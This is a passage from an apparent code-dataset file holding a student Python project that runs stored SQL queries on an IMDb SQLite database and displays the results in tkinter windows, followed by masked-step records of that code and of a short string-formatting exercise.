    fenetre.mainloop()
""""""""""""""""""""""""""""""""""""""""""""""""
def requete(n, dico):
    """
    Take n, the index of the query in the dictionary, and dico, a
    dictionary of queries.
    Run the query once and display its result table in a window.
    Returns nothing.
    """
    # run the query a single time and reuse the result
    # (the original queried the database twice: once into an unused
    # variable and once again inside the afficher_table call)
    resultats = execute(n, dico)
    afficher_table(resultats, dico[n][0])
import tkinter
import os
def afficher_table(table, titre ="", debut = 0, fin = None):
    """
    Take table a list and titre a string (debut and fin are forwarded
    to texte_table).
    Open a window showing the rendered table. Returns nothing.
    Note: when titre is non-empty, the title with its trailing blank
    lines is also used as the window name (original behaviour kept).
    """
    en_tete = titre + "\n\n" if titre else titre
    affichage(en_tete + texte_table(table, debut, fin), en_tete)
def texte_table(table, debut = 0, fin = None):
    """
    Take table a list (debut and fin are accepted but not used by the
    current implementation).
    Return a string drawing an ASCII table with one element per cell,
    every cell padded to the width of the largest element.
    """
    largeur = taille_plus_grande_reponse(table)
    separateur = '+' + '-' * largeur + '+\n'
    morceaux = [separateur]
    for element in table:
        # ljust pads the cell with spaces up to the common width
        morceaux.append('|' + str(element).ljust(largeur) + '|\n')
        morceaux.append(separateur)
    return ''.join(morceaux)
def affichage(texte, titre = "Requêtes tables"):
    """
    Take texte, the character string to display, and titre, the window
    title.
    Open a near-full-screen tkinter window showing texte in a Text
    widget with horizontal and vertical scrollbars; blocks in mainloop
    until the window is closed. Returns nothing.
    """
    root = tkinter.Tk()
    root.title(str(titre))
    # window sized 100 px smaller than the screen, placed near the top-left
    RWidth=root.winfo_screenwidth() - 100
    RHeight=root.winfo_screenheight() - 100
    root.geometry("%dx%d+50+0"%(RWidth, RHeight))
    # wrap='none' keeps each long table row on one line (hence the
    # horizontal scrollbar below)
    text=tkinter.Text(root, wrap = 'none')
    scroll_x=tkinter.Scrollbar(text.master, orient='horizontal', command = text.xview)
    # NOTE(review): this config repeats the command already set above
    scroll_x.config(command = text.xview)
    text.configure(xscrollcommand = scroll_x.set)
    scroll_x.pack(side = 'bottom', fill = 'x', anchor = 'w')
    scroll_y = tkinter.Scrollbar(text.master)
    scroll_y.config(command = text.yview)
    text.configure(yscrollcommand = scroll_y.set)
    scroll_y.pack(side = tkinter.RIGHT, fill = 'y')
    # insert the rendered table at the very beginning of the widget
    text.insert("1.0", texte)
    text.pack(side = tkinter.LEFT, expand = True, fill = tkinter.BOTH)
    root.mainloop()
def fichier_txt_en_texte(fichier):
    """
    Take the path of a text file.
    Return the whole content of the file as one string.
    """
    with open(fichier, 'r') as flux:
        contenu = flux.read()
    return contenu
def chemin(nom, repertoire):
    """
    Take the file name of a stored query and the name of the directory
    that contains it.
    Return the path of the query file ("repertoire/nom").
    """
    return "{}/{}".format(repertoire, nom)
def texte_en_liste(nom_requete, repertoire):
    """
    Read the query file nom_requete inside repertoire and return its
    content split on whitespace, as a list of words.
    """
    contenu = fichier_txt_en_texte(chemin(nom_requete, repertoire))
    return contenu.split()
def liste_en_texte(liste):
    """
    Take a list and return its elements converted to text, each one
    followed by a single space (an empty list gives an empty string).
    """
    return ''.join('{} '.format(element) for element in liste)
def separer_requete_et_question(nom, repertoire):
    """
    Take the file name of a query and its directory.
    Return a two-element list [question, query]: the words up to and
    including the first '?' form the question, the remaining words form
    the query. If no '?' is present the question is empty and the whole
    file content becomes the query (original behaviour kept).
    """
    mots = texte_en_liste(nom, repertoire)
    question = ""
    if '?' in mots:
        coupure = mots.index('?') + 1   # keep the '?' inside the question
        question = mots[:coupure]
        mots = mots[coupure:]
    return [liste_en_texte(question), liste_en_texte(mots)]
def creer_dictionnaire_vide():
    """
    Take no argument and return a new empty dictionary.
    """
    return dict()
def nom_element_du_repertoire(repertoire, base=
        "C:\\Users\\Elève\\Desktop\\projet NSI\\projetsqlKilian\\projetsqlKilian\\"):
    """
    Take the name of a directory stored in the projetsqlKilian folder.
    Return the list of the file names it contains.

    base -- prefix prepended to repertoire. It defaults to the
            historical hard-coded absolute Windows path so existing
            callers keep working, but it can now be overridden, which
            makes the function portable and testable.
    """
    return os.listdir(base + repertoire)
def stocker_requete(dico, repertoire):
    """
    Take dico, an (empty) dictionary, and repertoire, the name of the
    directory where the queries are stored.
    Fill dico in place: entry i becomes ['#i+1) question', query text].
    Returns nothing.
    """
    for indice, nom in enumerate(nom_element_du_repertoire(repertoire)):
        question, corps = separer_requete_et_question(nom, repertoire)
        dico[indice] = ['#{}) {}'.format(indice + 1, question), corps]
def afficher(dico):
    """
    Take a dictionary and return that same dictionary unchanged.
    """
    resultat = dico
    return resultat
# Script entry point: build the query dictionary from the 'requête'
# directory, then open the question-selection window (blocks in the
# tkinter mainloop until the user closes it).
a = creer_dictionnaire_vide()
stocker_requete(a,'requête')
#print(afficher(a))
question(a)
# Manual debugging helpers kept from development:
#print(nom_element_du_repertoire('requête'))
#requete(a)
#print(execute(1,a))
#print(taille_plus_grande_reponse(execute(1,a)))
|
flexible
|
{
"blob_id": "7618d7fde3774a04ac2005dad104e54b9988d3e8",
"index": 9487,
"step-1": "<mask token>\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\n<mask token>\n\n\ndef stocker_requete(dico, 
repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-2": "def execute(n, dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n 
for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\n<mask token>\n\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = (\n 'C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\'\n + repertoire)\n nom_requete = os.listdir(path)\n return nom_requete\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-3": "def execute(n, dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n 
for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef fichier_txt_en_texte(fichier):\n \"\"\"\n prend en argument le chemin d'un fichier texte\n Renvoie le contenu du fichier texte sous forme de chaîne de caractère.\n \"\"\"\n with open(fichier, 'r') as requete:\n return requete.read()\n\n\ndef chemin(nom, repertoire):\n \"\"\"\n Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.\n Renvoie le chemin de la requête.\n \"\"\"\n return repertoire + '/' + nom\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\n<mask token>\n\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = (\n 'C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\'\n + repertoire)\n nom_requete = os.listdir(path)\n return nom_requete\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-4": "def execute(n, dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\n<mask token>\n\n\ndef affichage_question(dico, texte, titre='Question'):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton = {}\n bouton[i] = Button(fenetre, text=texte[i], command=lambda n=i, dico\n =dico: requete(n, dico))\n bouton[i].pack()\n fenetre.mainloop()\n\n\n<mask token>\n\n\ndef requete(n, dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n, dico)\n afficher_table(execute(n, dico), dico[n][0])\n\n\n<mask token>\n\n\ndef afficher_table(table, titre='', debut=0, fin=None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != '':\n titre += '\\n\\n'\n affichage(titre + texte_table(table, debut, fin), titre)\n\n\ndef texte_table(table, debut=0, fin=None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n 
for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))\n ) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\n\n<mask token>\n\n\ndef fichier_txt_en_texte(fichier):\n \"\"\"\n prend en argument le chemin d'un fichier texte\n Renvoie le contenu du fichier texte sous forme de chaîne de caractère.\n \"\"\"\n with open(fichier, 'r') as requete:\n return requete.read()\n\n\ndef chemin(nom, repertoire):\n \"\"\"\n Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.\n Renvoie le chemin de la requête.\n \"\"\"\n return repertoire + '/' + nom\n\n\ndef texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\n\ndef liste_en_texte(liste):\n \"\"\"\n prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.\n \"\"\"\n texte = ''\n for i in range(len(liste)):\n texte = texte + str(liste[i]) + ' '\n return texte\n\n\n<mask token>\n\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = (\n 'C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\'\n + repertoire)\n nom_requete = os.listdir(path)\n return nom_requete\n\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i + 1) + ') ' + 
requete[0], requete[1]]\n\n\ndef afficher(dico):\n \"\"\"\n prend en argument un dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\n\n<mask token>\n",
"step-5": "def execute(n,dico):\n \"\"\"\n Prend en argument n, la position de la requête dans le dictionaire et dico le nom du dictionnaire.\n Renvoie une liste dont chaque élément est une réponse de la requête.\n \"\"\"\n l = []\n import sqlite3\n conn = sqlite3.connect('imdb.db')\n c = conn.cursor()\n c.execute(dico[n][1])\n for row in c:\n l.append(row)\n conn.close()\n return l\n\ndef taille_plus_grande_reponse(reponses):\n \"\"\"\n Prend en argument une liste.\n Renvoie la taille du plus grand élément de la liste.\n \"\"\"\n l = reponses\n maxi = 0\n for i in range(len(l)):\n if len(str(l[i])) > maxi:\n maxi = len(str(l[i]))\n return maxi\n\n\"\"\"affichage question\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nfrom tkinter import *\n\ndef question(dico):\n \"\"\"\n prend en argument un disctionnaire.\n Ne renvoie rien.\n \"\"\"\n l = []\n for i in range(len(dico)):\n l.append(dico[i][0])\n affichage_question(dico,l)\n\ndef affichage_question(dico, texte, titre = \"Question\"):\n \"\"\"\n prend en argument dico un dictionnaire, texte une liste, et titre une chaine de caractère.\n Renvoie une page tkinter où chaque indice de la liste texte est un bouton clickable et où titre et le nom de la page.\n \"\"\"\n fenetre = tkinter.Tk()\n fenetre.title(titre)\n for i in range(len(texte)):\n bouton={}\n bouton[i]=Button(fenetre, text=texte[i], command=lambda n=i, dico=dico:requete(n,dico))\n bouton[i].pack()\n\n\n fenetre.mainloop()\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\ndef requete(n,dico):\n \"\"\"\n prend en argument n l'indice de la requête dans le dictionnaire et dico un dictionnaire.\n ne renvoie rien\n \"\"\"\n r = execute(n,dico)\n afficher_table(execute(n,dico),dico[n][0])\n\nimport tkinter\nimport os\n\ndef afficher_table(table, titre =\"\", debut = 0, fin = None):\n \"\"\"\n prend en argument table une liste et titre une chaine de caractère.\n ne renvoie rien.\n \"\"\"\n if titre != 
\"\":\n\t titre += \"\\n\\n\"\n\t#print(titre + texte_table(table, debut, fin))\n affichage(titre + texte_table(table, debut, fin), titre)\n \ndef texte_table(table, debut = 0, fin = None):\n \"\"\"\n prend en argument table une liste.\n renvoie une chaîne de caractère composé d'un tableau avec dans chaque case un élement de table.\n \"\"\"\n max = taille_plus_grande_reponse(table)\n texte = '+' + max * '-' + '+\\n'\n for i in range(len(table)):\n texte = texte + '|' + str(table[i]) + (max - len(str(table[i]))) * ' ' + '|' + '\\n+' + max * '-' + '+\\n'\n return texte\n\ndef affichage(texte, titre = \"Requêtes tables\"):\n \"\"\"\n prend en argument texte une chaîne de caractère et titre une chaine de caractère\n renvoie une fenêtre tkinter\n \"\"\"\n root = tkinter.Tk()\n root.title(str(titre))\n RWidth=root.winfo_screenwidth() - 100\n RHeight=root.winfo_screenheight() - 100\n root.geometry(\"%dx%d+50+0\"%(RWidth, RHeight))\n text=tkinter.Text(root, wrap = 'none')\n scroll_x=tkinter.Scrollbar(text.master, orient='horizontal', command = text.xview)\n scroll_x.config(command = text.xview)\n text.configure(xscrollcommand = scroll_x.set)\n scroll_x.pack(side = 'bottom', fill = 'x', anchor = 'w')\n scroll_y = tkinter.Scrollbar(text.master)\n scroll_y.config(command = text.yview)\n text.configure(yscrollcommand = scroll_y.set)\n scroll_y.pack(side = tkinter.RIGHT, fill = 'y')\n text.insert(\"1.0\", texte)\n text.pack(side = tkinter.LEFT, expand = True, fill = tkinter.BOTH)\n root.mainloop()\n\ndef fichier_txt_en_texte(fichier):\n \"\"\"\n prend en argument le chemin d'un fichier texte\n Renvoie le contenu du fichier texte sous forme de chaîne de caractère.\n \"\"\"\n with open(fichier, \"r\") as requete:\n return requete.read()\n\ndef chemin(nom, repertoire):\n \"\"\"\n Prend en argument le nom du fichier où est stocké la requête et le nom du répertoire dans lequel est stocké la requête.\n Renvoie le chemin de la requête.\n \"\"\"\n return repertoire + '/' + nom\n\ndef 
texte_en_liste(nom_requete, repertoire):\n requete = fichier_txt_en_texte(chemin(nom_requete, repertoire))\n return requete.split()\n\ndef liste_en_texte(liste):\n \"\"\"\n prend en argument une liste et un indice et renvoie la même liste mais l'élement d'indice 'n' est transformé en texte.\n \"\"\"\n texte = \"\"\n for i in range(len(liste)):\n texte = texte + str(liste[i]) + \" \"\n return texte\n \ndef separer_requete_et_question(nom, repertoire):\n \"\"\"\n prend en argument le numéro de la requête et renvoie la question et la requête sésparé.\n \"\"\"\n requete = texte_en_liste(nom, repertoire) #transforme la requête en tableau\n question = \"\"\n for i in range(len(requete)): #cherche le moment où la question s'arrête et sépare la question de la requête\n if requete[i] == \"?\":\n question = requete[0:i+1] #stock la question\n requete = requete[i+1:len(requete)] #stock la réponse\n break #stop la boucle quand la \"?\" est trouvé\n return [liste_en_texte(question),liste_en_texte(requete)]\n\ndef creer_dictionnaire_vide():\n \"\"\"\n Ne contient aucun argument et renvoie un dictionnaire vide.\n \"\"\"\n dico = {}\n return dico\n\ndef nom_element_du_repertoire(repertoire):\n \"\"\"\n prend en argument le nom d'un répertoire ranger dans le dossier projetsqlKilian.\n renvoie une liste dont chaque élément est le nom d'un des fichier du repertoir.\n \"\"\"\n path = \"C:\\\\Users\\\\Elève\\\\Desktop\\\\projet NSI\\\\projetsqlKilian\\\\projetsqlKilian\\\\\" + repertoire\n nom_requete = os.listdir(path) \n return nom_requete\n\ndef stocker_requete(dico, repertoire):\n \"\"\"\n prend en argument dico un dictionnaire vide et repertoire le nom du repertoir où sont sockés les requêtes.\n ne renvoie rien\n \"\"\"\n liste = nom_element_du_repertoire(repertoire)\n for i in range(len(liste)):\n requete = separer_requete_et_question(liste[i], repertoire)\n dico[i] = ['#' + str(i+1) + ') ' + requete[0], requete[1]]\n \n \ndef afficher(dico):\n \"\"\"\n prend en argument un 
dictionnaire et renvoie ce disctionnaire.\n \"\"\"\n return dico\n\na = creer_dictionnaire_vide()\nstocker_requete(a,'requête')\n#print(afficher(a))\nquestion(a)\n#print(nom_element_du_repertoire('requête'))\n#requete(a)\n#print(execute(1,a))\n#print(taille_plus_grande_reponse(execute(1,a)))",
"step-ids": [
8,
11,
13,
14,
21
]
}
|
[
8,
11,
13,
14,
21
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
string = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'
upp_regist = low_regist = title_regist = 0
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
<|reserved_special_token_1|>
"""
1. Если в строке больше символов в нижнем регистре - вывести все в нижнем,
если больше в верхнем - вывести все в верхнем,
если поровну - вывести в противоположных регистрах.
2. Если в строке каждое слово начинается с заглавной буквы, тогда
добавить в начало строки 'done. '.
Иначе заменить первые 5 элементов строки на 'draft: '.
(можно использовать метод replace и/или конкатенацию строк + срезы)
3. Если длина строки больше 20, то обрезать лишние символы до 20.
Иначе дополнить строку символами '@' до длины 20.
(можно использовать метод ljust либо конкатенацию и дублирование (+ и *))
После выполнения кажого пункта выводить результат типа:
1. Исходная строка: "some string".
Результат: "some edited string".
(Использовать форматирование строк f либо метод format)
"""
string = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'
upp_regist = low_regist = title_regist = 0
for char in string:
if char.isupper():
upp_regist += 1
elif char.islower():
low_regist += 1
print('Some string:', string)
if upp_regist > low_regist:
print('Some edited string:', string.upper())
elif low_regist > upp_regist:
print('Some edited string:', string.lower())
else:
print('Some edited string:', string.swapcase())
print('Some string:', string)
if string.istitle():
print('Some edited string: done. ' + string)
else:
print('Some edited string:', string.replace('Lorem', 'draft: '))
print('Some string:', string)
if len(string) > 20:
string = string[:20]
print('Some edited string:', string)
else:
print('Some edited string:', string.ljust(20, '@'))
|
flexible
|
{
"blob_id": "c7c405535b2ca656d4d5f18013e3e2fdef70efea",
"index": 8088,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor char in string:\n if char.isupper():\n upp_regist += 1\n elif char.islower():\n low_regist += 1\nprint('Some string:', string)\nif upp_regist > low_regist:\n print('Some edited string:', string.upper())\nelif low_regist > upp_regist:\n print('Some edited string:', string.lower())\nelse:\n print('Some edited string:', string.swapcase())\nprint('Some string:', string)\nif string.istitle():\n print('Some edited string: done. ' + string)\nelse:\n print('Some edited string:', string.replace('Lorem', 'draft: '))\nprint('Some string:', string)\nif len(string) > 20:\n string = string[:20]\n print('Some edited string:', string)\nelse:\n print('Some edited string:', string.ljust(20, '@'))\n",
"step-3": "<mask token>\nstring = 'Lorem, Ipsum, Is, SImPlY, DuMMy, TEXT, Of, The, Printing, INDUSTRY.'\nupp_regist = low_regist = title_regist = 0\nfor char in string:\n if char.isupper():\n upp_regist += 1\n elif char.islower():\n low_regist += 1\nprint('Some string:', string)\nif upp_regist > low_regist:\n print('Some edited string:', string.upper())\nelif low_regist > upp_regist:\n print('Some edited string:', string.lower())\nelse:\n print('Some edited string:', string.swapcase())\nprint('Some string:', string)\nif string.istitle():\n print('Some edited string: done. ' + string)\nelse:\n print('Some edited string:', string.replace('Lorem', 'draft: '))\nprint('Some string:', string)\nif len(string) > 20:\n string = string[:20]\n print('Some edited string:', string)\nelse:\n print('Some edited string:', string.ljust(20, '@'))\n",
